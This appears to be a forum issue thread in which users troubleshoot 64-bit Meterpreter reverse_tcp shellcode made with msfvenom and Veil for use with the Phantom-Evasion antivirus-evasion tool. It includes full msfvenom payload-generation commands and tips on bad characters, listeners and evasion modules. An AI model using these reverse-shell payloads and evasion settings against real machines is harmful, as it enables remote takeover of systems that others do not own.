Shellcode

[anonymouz4]

This is fresh new summary of this old issue

A lot of people had issues with creating custom shellcode and using it.

What is the goal: Create a 64bit shellcode (reverse_tcp) and using it with Phantom-Evasion

Previous tries:

• Veil doesn't support 64bit (32bit didn't work for me)
• Using msfvenom (connected on 32bit, but instantly died. 64bit not at all) msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f c -b "/x00/x0a/x0d" > outfile (used windows/x64/meterpreter/reverse_tcp of course at 64bit in listener and generator)

Question: Can anyone who got this working post a detailed list of steps he did to achieve this? Something like:

• What Shellcode Generator? (eg. Veil, msfvenom, etc.)
• What Encoders for shellcode? (eg. None, Xor, etc.)
• What Badchars?
• What Modules? (eg. HeapAlloc, VirtualAlloc, etc.)
• What Encoders in Phantom-Evasion?
• etc.

Maybe @oddcod3 already tested this!

[usama7628674]

@anonymouz4 I will retest 32 bit shellcode from veil and share the results tomorrow.Maybe it's not working just for you

[anonymouz4]

@usama7628674 I took the time to write this question as good as possible so please also read it carefully. The question is to create 64bit shellcode, which is not possible with veil.

[usama7628674]

@anonymouz4 Veil 32 bit shellcode is working fine.I got the session back to meterpreter.Just generated the shellcode and while compiling I used x86 arch and then ran it on my windows 10 v1803 and I can confirm I got the session.

Msfvenom 32 bit shellcode is also working fine and yes it wasn't dying for me.Make sure windows defender is turned off The command I used while generating 32 bit shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f c -b "/x00/x0a/x0d" > /root/Desktop/output

Msfvenom 64 bit shellcode is also working fine for me.The command that I used while generating 64 bit shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f c -b "/x00/x0a/x0d/xf0" > /root/Desktop/outputs

All the tests are done with windows shellcode injection multipath heapalloc option no (4) and for encoder as well option (4)

All three options are working for me but sadly all are detected by windows defender.I've to disable it while testing

Make sure you setup 32 listener if you're using 32 bit shellcode and 64 bit listener if you're using 64 bit shellcode cuz I made a mistake that I setup 32 bit listener while I generated 64 bit shellcode the session did open but it instantly closed

metasploit version that I used 4.16.59-dev

[anonymouz4]

@usama7628674 First, thanks for taking the time! Why did you also use "/xf0" as badchar or where did you get this info from? just curious And which os are you using as listener? I'm listening with msfconsole on MacOS. Maybe the metasploit-framework doesn't work 100% on mac.

[usama7628674]

@anonymouz4

Why did you also use "/xf0" as badchar or where did you get this info from?

I did use it in 64 bit shellcode cuz if I don't use it the output shellcode has bad characters \x00\x0d so that's why I use it.After using it all the bad chars were gone from shellcode.

And which os are you using as listener?

Kali linux 2018.2 Metasploit version 4.16.59-dev